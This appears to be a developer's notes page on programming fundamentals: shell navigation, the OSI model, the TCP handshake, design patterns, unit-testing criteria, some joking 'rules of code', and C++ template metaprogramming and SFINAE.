pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -


“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer No. Name Function
7 Application Layer Provides network services to applications
6 Presentation Layer Handles data formatting and translation
5 Session Layer Manages communication sessions between devices
4 Transport Layer Ensures reliable data delivery and handles error correction
3 Network Layer Manages logical addressing and routing of data packets
2 Data Link Layer Handles physical addressing and error detection of data frames
1 Physical Layer Transmits raw data between devices and handles the physical connection

Three way handshake

The TCP three way handshake is a method used by devices to establish a reliable connection and ensure proper communication between them. It is a three-step process that takes place before any data is transmitted between the two devices.

  1. Step 1 - SYN: The first step in the three-way handshake is the synchronization (SYN) packet. The client sends a SYN packet to the server indicating its intention to establish a connection. This packet contains a randomly generated sequence number that is used to keep track of the data being transmitted.

  2. Step 2 - SYN-ACK: Upon receiving the SYN packet, the server sends a SYN-ACK packet back to the client. This packet acknowledges the client’s request and also contains a randomly generated sequence number. The server also increments the client’s sequence number by 1.

  3. Step 3 - ACK: Finally, the client sends an acknowledgment (ACK) packet to the server, confirming that it has received the SYN-ACK packet. The client also increments the server’s sequence number by 1. At this point, the connection is established, and both devices are ready to start transmitting data.

Once the three-way handshake is completed, a reliable connection is established between the two devices, and they can begin exchanging data packets. This method ensures that both devices are synchronized and ready to communicate before any data is transmitted, reducing the chances of data loss or errors during transmission. Additionally, the sequence numbers exchanged during the handshake help to keep track of the data being transmitted, allowing for efficient and accurate data transfer.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= ACK

Design patterns

The objective of design patterns is to provide a set of proven and reusable solutions to commonly occurring design problems in software development. These patterns help developers to create well-structured, maintainable, and extensible code that can easily be adapted to changing requirements. By following established design patterns, developers can save time and effort in developing solutions to common problems, as these patterns have already been tested and proven to be effective. They also promote consistency and standardization in software design, making it easier for other developers to understand and maintain the code. Ultimately, the goal of design patterns is to improve the overall quality and efficiency of software development.


Common patterns

  1. Singleton Pattern: Ensures that only one instance of a class is created and provides a global access point to that instance.

  2. Factory Pattern: Creates objects without exposing the instantiation logic to the client and refers to the newly created object through a common interface.

  3. Observer Pattern: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.

  4. Decorator Pattern: Dynamically adds new functionality to an existing object without changing its structure.

  5. Adapter Pattern: Allows the interface of an existing class to be used as another interface.

  6. Strategy Pattern: Defines a family of algorithms, encapsulates each one, and makes them interchangeable. It allows the algorithm to vary independently from clients that use it.

  7. Iterator Pattern: Provides a way to access the elements of an aggregate object sequentially without exposing its underlying representation.

  8. Template Method Pattern: Defines the skeleton of an algorithm in a method, deferring some steps to subclasses.

  9. Proxy Pattern: Provides a surrogate or placeholder object to control access to another object.

  10. Command Pattern: Encapsulates a request as an object, thereby allowing for parameterization of clients with different requests, queueing or logging of requests, and support for undoable operations.

  11. State Pattern: Allows an object to alter its behavior when its internal state changes.

  12. Composite Pattern: Composes objects into tree structures to represent part-whole hierarchies. It lets clients treat individual objects and compositions of objects uniformly.

  13. Bridge Pattern: Separates an object’s interface from its implementation so that the two can vary independently.

  14. Facade Pattern: Provides a unified interface to a set of interfaces in a subsystem. It defines a higher-level interface that makes the subsystem easier to use.

  15. Flyweight Pattern: Uses sharing to support large numbers of fine-grained objects efficiently.

  16. Visitor Pattern: Defines a new operation to a class without changing the class itself.

  17. Chain of Responsibility Pattern: Allows a request to be passed through a chain of handlers until one of them handles the request.

  18. Interpreter Pattern: Defines a language and provides an interpreter for processing expressions in that language.

  19. Memento Pattern: Captures and externalizes an object’s internal state so that the object can be restored to this state later.

  20. Mediator Pattern: Defines an object that encapsulates how a set of objects interact. It promotes loose coupling by keeping objects from referring to each other explicitly, and it allows their interaction to vary independently.

Factory pattern

The factory design pattern is a creational design pattern that allows for the creation of objects without having to specify the exact class of object that will be created. It is used to create objects that are similar in nature, but have different properties or behaviors.

The basic idea behind the factory design pattern is to have a central factory class that is responsible for creating and managing the creation of objects. This factory class contains a method or set of methods that take in some input parameters and return a new object based on those parameters.

There are two main types of factory design patterns: the simple factory and the abstract factory.

  1. Simple Factory: The simple factory pattern involves a single factory class that creates different types of objects based on a given set of parameters. This is the most basic form of the factory pattern and is useful when the creation of objects is straightforward and does not require complex logic.

  2. Abstract Factory: The abstract factory pattern involves a set of related factory classes that each create a different type of object. These factory classes are usually organized in a hierarchy, with a parent factory class that defines a common interface and child factory classes that implement this interface to create specific types of objects. This allows for more flexibility and scalability in creating objects, as well as the ability to add new types of objects without changing the existing code.

The factory design pattern provides several benefits, including:

  1. Encapsulation: The creation of objects is encapsulated within the factory class, which means that the creation logic can be changed without affecting the client code.

  2. Abstraction: The client code does not need to know the specific class of object being created, as it only interacts with the factory class.

  3. Flexibility: The factory class can be extended or modified to create new types of objects without having to change the existing code.

  4. Code reusability: By using a factory class, the creation code is centralized and can be reused by different parts of the program, reducing code duplication.

  5. Decoupling: The factory design pattern helps to decouple the creation of objects from the client code, which promotes a more modular and maintainable codebase.

In summary, the factory design pattern is a useful tool for creating objects in a flexible and maintainable way. It allows for the creation of objects without tightly coupling them to the client code, promoting a more modular and reusable code structure.

Example of factory pattern

Store a system configuration in an external text file and construct it at runtime using the factory pattern.

Visitor pattern

The visitor design pattern is a behavioral design pattern that allows for the separation of an algorithm from the objects on which it operates. This pattern is used when there are a set of objects with different data structures and behaviors, and the algorithm needs to be applied to all of them without changing their structure or behavior.

In this pattern, a visitor class is created that contains methods for each type of object that the algorithm needs to operate on. The objects that need to be visited must implement an accept() method which takes the visitor object as a parameter. When this method is called, the visitor object can then access and manipulate the data of the object being visited.

The main benefit of using the visitor pattern is that it allows for adding new operations to a set of objects without having to modify their individual classes. This promotes the open-closed principle, where classes are open for extension but closed for modification.

One example of the visitor pattern is in a shopping cart application, where the visitor object could be a discount calculator. Each item in the shopping cart could accept the visitor object and provide access to its price, allowing the visitor to calculate and apply a discount.

Another example is in a hierarchical data structure, such as a file system. The visitor object could be a file search algorithm that visits each file and folder in the structure to find a specific file.

In summary, the visitor design pattern allows for the separation of an algorithm from the objects it operates on, promoting code reusability and maintainability. It is particularly useful in scenarios where a set of objects with different structures and behaviors need to be operated on without changing their individual classes.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch is a type of subtype polymorphism where the behavior of a method is determined by the runtime types of two objects involved in the method call. It allows for more specific and dynamic method calls based on the specific types of objects involved, rather than just the type of the calling object.

In double dispatch, the method to be executed is determined by the combination of the runtime types of both the calling object and the parameter object. This means that the same method can have different behaviors depending on the types of objects involved, allowing for more flexibility and specificity in method calls.

This is achieved through a two-step dispatch process. First, the method is dispatched based on the runtime type of the calling object. Then, within that method, another dispatch is performed based on the runtime type of the parameter object. This allows for the method to be executed based on the specific types of both objects involved, rather than just the calling object’s type.

Double dispatch is useful in situations where the behavior of a method needs to vary depending on the types of objects involved. This is often seen in scenarios where multiple classes inherit from a common superclass and have their own specific implementations of a method. By using double dispatch, the correct method can be called based on both the calling object and the parameter object, resulting in more precise and flexible code.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map, which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally, if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.


Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a software design principle that states that high-level modules or classes should not depend on low-level modules or classes directly. Instead, they should depend on abstractions or interfaces, and the implementation of these interfaces should be provided by low-level modules or classes. This allows for loose coupling between modules or classes, making the code more flexible, reusable, and maintainable. It also allows for easier testing and the ability to swap out different implementations without affecting the high-level modules. Dependency inversion is often achieved through the use of dependency injection, where the dependencies are injected into a class or module at runtime rather than being hard-coded.

The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code (makes testing easier)
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting: even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if it:

  1. Talks to the database
  2. Communicates across the network
  3. Touches the file system
  4. Can’t run at the same time as any of your other unit tests
  5. Requires you to do special things to your environment (such as editing config files) to run it

See the complete article.

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a technique used in C++ for writing generic code that can work with different data types at compile time. It involves using templates, which are code patterns that can be parameterized with one or more types or values. These templates are then instantiated with specific types or values at compile time, which generates specialized code for each instantiation.

The main benefit of template metaprogramming is that it allows for code reuse and flexibility, as the same code can be used with different data types without having to write separate implementations for each type. This can lead to more efficient and concise code, as well as improved performance.

One of the key features of template metaprogramming is the ability to perform compile-time computations and operations. This is made possible through the use of template parameters, which can be used in expressions and evaluated at compile time. This allows for the generation of complex and optimized code at compile time, rather than at runtime.

Template metaprogramming also makes use of template specialization, which allows for different implementations of a template for specific types or values. This can be useful for handling special cases or providing different functionality for different types.

Another important aspect of template metaprogramming is the concept of constexpr, which allows for certain functions and variables to be evaluated at compile time. This can be beneficial for performance-critical code, as it avoids the overhead of runtime function calls.

Overall, template metaprogramming is a powerful and flexible technique for writing generic code in C++. It allows for efficient and optimized code to be generated at compile time, leading to improved performance and code reuse. However, it can be complex and requires a good understanding of C++ templates and the rules of template metaprogramming.

Templates in the C++ Standard Library allow for generic programming, meaning that the same code can be used to operate on different data types without the need for separate implementations. This allows for code reuse and more efficient development.

The C++ Standard Library contains numerous template classes and functions, such as containers (e.g. vector, list, map), algorithms (e.g. sort, find, count), and iterators (e.g. begin, end). These templates can be used to perform a variety of tasks, such as storing and manipulating data, sorting and searching data, and iterating over data structures.

One of the main benefits of using templates in the C++ Standard Library is the ability to write code that is independent of specific data types. For example, the sort function can be used to sort a vector of integers, a vector of strings, or any other type of data that supports comparison. This eliminates the need for writing multiple versions of the same function for different data types.

Another benefit of templates in the C++ Standard Library is the ability to customize the behavior of classes and functions for specific data types. This is achieved through template parameters, which allow for the specification of the data type(s) to be used with a particular template. For example, the vector class can be used with a custom data type by specifying the type as a template parameter, allowing for flexibility and versatility in programming.

Lastly, templates in the C++ Standard Library also support compile-time polymorphism, also known as static polymorphism. This means that the compiler can generate specialized versions of a template at compile time based on the data types used, resulting in more efficient code execution.

Overall, templates in the C++ Standard Library play a crucial role in making the language more versatile, efficient, and flexible, allowing for the creation of powerful and reusable code.


SFINAE

SFINAE (Substitution Failure Is Not An Error) is a concept in C++ template programming that allows for selective compilation of code based on the availability of certain types or functions. It works by using template specialization and function overloading to check if a certain type or function is valid or “substitutable” in a given context. If the type or function is valid, the code is compiled, but if it is not, the code is discarded and the compiler moves on to the next potential option. This allows for more flexible and customizable code, as well as the ability to gracefully handle errors and special cases.